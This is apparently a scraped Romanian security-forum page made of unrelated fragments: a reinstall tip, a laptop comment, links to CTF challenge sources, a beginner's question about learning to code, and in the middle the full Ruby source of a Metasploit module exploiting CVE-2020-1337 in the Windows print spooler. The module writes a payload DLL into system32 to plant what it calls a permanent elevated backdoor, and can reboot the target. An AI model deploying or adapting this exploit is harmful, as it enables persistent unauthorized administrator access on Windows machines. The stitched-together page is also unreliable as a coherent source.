Leaderboard

The easiest solution would be to uninstall it and install it again, latest version. Restart(s) might be needed but it should work.

This exploit leverages a file write vulnerability in the print spooler service which will restart if stopped. Because the service cannot be stopped long enough to remove the dll, there is no way to remove the dll once it is loaded by the service. Essentially, on default settings, this module adds a permanent elevated backdoor. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core/post/windows/powershell' class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::Common include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Exploit::EXE include Msf::Post::Windows::Powershell prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Microsoft Spooler Local Privilege Elevation Vulnerability', 'Description' => %q{ This exploit leverages a file write vulnerability in the print spooler service which will restart if stopped. Because the service cannot be stopped long enough to remove the dll, there is no way to remove the dll once it is loaded by the service. Essentially, on default settings, this module adds a permanent elevated backdoor. }, 'License' => MSF_LICENSE, 'Author' => [ 'Peleg Hadar', # Original discovery 'Tomer Bar', # Original discovery '404death', # PoC 'sailay1996', # PoC 'bwatters-r7' # msf module ], 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Targets' => [ [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X64 ] } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => '2019-11-04', 'References' => [ ['CVE', '2020-1337'], ['URL', 'https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1337'], ['URL', 'https://github.com/sailay1996/cve-2020-1337-poc'], ['URL', 'https://voidsec.com/cve-2020-1337-printdemon-is-dead-long-live-printdemon/'] ], 'DefaultOptions' => { 'DisablePayloadHandler' => true }, 'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ] ) ) register_options([ OptString.new('JUNCTION_PATH', [false, 'Path to use as junction (%TEMP%/%RAND% by default).', nil]), OptString.new('DESTINATION_PATH', [false, 'Location of file to overwrite (%WINDIR%\system32\ by default).', nil]), OptString.new('DESTINATION_FILE', [false, 'Filename to overwrite (ualapi.dll by default).', nil]), OptString.new('PRINTER_NAME', [true, 'Printer Name to use (%RAND% by default).', Rex::Text.rand_text_alpha(5..9).to_s]), OptBool.new('RESTART_TARGET', [false, 'Restart the target after exploit (you will lose your session until a second reboot).', false]) ]) end def cve_2020_1337_privileged_filecopy(destination_file, destination_path, junction_path, printer_name, b64_payload) # Read in Generic Script script = exploit_data('CVE-2020-1337', 'cve-2020-1337.ps1') fail_with(Failure::BadConfig, 'No exploit script found') if script.nil? # Replace Values in Generic Script vprint_status('Replacing variables') junction_filepath = "#{junction_path}\\#{destination_file}" # The random string appears to be required when using the psh_exec # It may be due to the way we break apart the script? # I would not be upset to find the root cause and fix it. script.gsub!('JUNCTION_FILEPATH', junction_filepath) script.gsub!('PRINTER_NAME', printer_name) script.gsub!('JUNCTION_PATH', junction_path) script.gsub!('DESTINATION_PATH', destination_path) script.gsub!('B64_PAYLOAD_DLL', b64_payload) # Run Exploit Script print_status("Running Exploit on #{sysinfo['Computer']}") begin #client.powershell.execute_string(code: script) session.powershell.execute_string({code: script}) rescue Rex::TimeoutError => e elog('Caught timeout. Exploit may be taking longer or it may have failed.', error: e) print_error('Caught timeout. Exploit may be taking longer or it may have failed.') end end def exploit if datastore['DESTINATION_PATH'].nil? || datastore['DESTINATION_PATH'].empty? win_dir = session.sys.config.getenv('windir') destination_path = "#{win_dir}\\system32" else destination_path = datastore['DESTINATION_PATH'] end if datastore['DESTINATION_FILE'].nil? || datastore['DESTINATION_FILE'].empty? destination_file = 'ualapi.dll' else destination_file = datastore['DESTINATION_FILE'] end if datastore['JUNCTION_PATH'].nil? || datastore['JUNCTION_PATH'].empty? junction_path = "#{session.sys.config.getenv('TEMP')}\\#{Rex::Text.rand_text_alpha(6..15)}" else junction_path = datastore['JUNCTION_PATH'] end client.core.use("powershell") if not client.ext.aliases.include?("powershell") printer_name = datastore['PRINTER_NAME'] payload_dll = generate_payload_dll # Check target vprint_status('Checking Target') validate_active_host validate_payload # Run the exploit output = cve_2020_1337_privileged_filecopy(destination_file, destination_path, junction_path, printer_name, Rex::Text.encode_base64(payload_dll)) sleep(3) # make sure exploit is finished # Reboot, if desired if datastore['RESTART_TARGET'] sleep(10) vprint_status("Rebooting #{sysinfo['Computer']}") begin session.sys.power.reboot rescue Rex::TimeoutError => e elog('Caught timeout. Exploit may be taking longer or it may have failed.', error: e) print_error('Caught timeout. Exploit may be taking longer or it may have failed.') end end end def validate_active_host begin print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}") rescue Rex::Post::Meterpreter::RequestError => e elog('Could not connect to session', error: e) raise Msf::Exploit::Failed, 'Could not connect to session' end end def validate_payload vprint_status("Target Arch = #{sysinfo['Architecture']}") vprint_status("Payload Arch = #{payload.arch.first}") unless payload.arch.first == sysinfo['Architecture'] fail_with(Failure::BadConfig, 'Payload arch must match target arch') end end def check sysinfo_value = sysinfo['OS'] build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i vprint_status("Build Number = #{build_num}") return Exploit::CheckCode::Appears if sysinfo_value =~ /10/ && build_num <= 18363 return Exploit::CheckCode::Safe end end # 0day.today [2021-01-19] # Source

Eu vedeam acel laptop ca pe o solutie pe termen lung. De exemplu, laptop-ul pe care il am acum, 24GB RAM, i7 (4 gen), 250 SSD + 750 HDD, il am de peste 6 ani si inca isi face treaba. Cand o sa crape (l-am reparat de vreo 3 or deja, dar din vina mea), vreau sa imi iau ceva care sa ma tina inca 6-7 ani.

Mai jos vom posta sursele de la challenge-urile de la CTF-ul RSTCon #1.

Reversing - The Encryptor (Nytro) https://github.com/RSTCon/ctf-the-encryptor

Pwn - Animalul preferat (Nytro) https://github.com/RSTCon/ctf-animals-pwn

Web - Platforma Intranet (Dragos) Requirements to run the challenge web server with PHP 7.2 or later openssl PHP module Installation copy files and deploy them on the web server add the server's hostname as a Trusted Origin in the Okta tenant used update the callback URL in index.php and in Okta tenant https://github.com/RSTCon/ctf-web-intranetplatform Nota: Pentru a rula challenge-ul local, va trebui: sa creati un tenant de Okta de aici sa creati o aplicatie de OpenID Connect in Okta (Admin >> Applications >> Add Application) sa adaugati callback URL-ul in index.php sub tab-ul General in tenant si userul vostru sub Assignments sa adaugati hostname-ul de la server (ex. localhost) in Trusted Origins cu optiunea de Redirect (Admin >> API >> Trusted Origins) sa setati callback url-ul in index.php sa fie identic cu ce ati setat in Okta Daca aveti probleme cu setarea challenge-ului local, dati-mi un pm.

Web - Motorul de cautare pentru vulnerabilitati (Dragos) Requirements to run the challenge web server with PHP 7.2 or later Installation copy files and deploy them on the web server https://github.com/RSTCon/ctf-web-vulnerability-search-engine

Web - Aresty File Uploader (Dragos) Requirements to run the challenge web server with PHP 7.2 or later Installation copy files and deploy them on the web server https://github.com/RSTCon/ctf-web-aresty-file-uploader

Misc - Ceainicul (Dragos) Requirements to run the challenge web server with PHP 7.2 or later Installation copy files and deploy them on the web server https://github.com/RSTCon/ctf-web-teapot

Salut. Sunt interesat sa incep sa invat programare, am 22de ani si 0experienta in domeniu. De curand am aflat de o platforma romaneasca ce pretinde ca, poate invata pe un individ/a 1limbaj de programare mulat pe capabilitatile acelei persoane. Practic exista o echipa formata din programatori ce te pot invata orice iti doresti onlie. Acum eu va intreb pe voi, stiu ca printre voi subt foarte multi experti in domeniu. As vrea sa incerc sa invat un limbaj de programate, cum ar fii: baze de date ;(presupun ca exista multa cerere in domeniu asta). Bazele programarii, etc. Platforma este: “”wellcode. r o”. Aici exista un interviu free. In care ei te suna ai afla mai multe lucruri despre ce vrei sa faci. Se muleaza dupa dorintele tale. Nu este specificat pretul acestui serviciu..presupun ca difera de la caz la caz. Rog un admin sa stearga link ul daca o considera o reclama. Acum va rog nu da-ti cu hate. Simt si trebuie sa fac ceva cu viata mea.. nu aleg asta doar din princina baniilor pe care ii poti castiga. Acesti indivizi sustin ca te poti angaja in mai putin de 365de zile. Va rog ce parere veti, nu da-ti cu hate. Si scuze daca te-am plictisit citind topicul.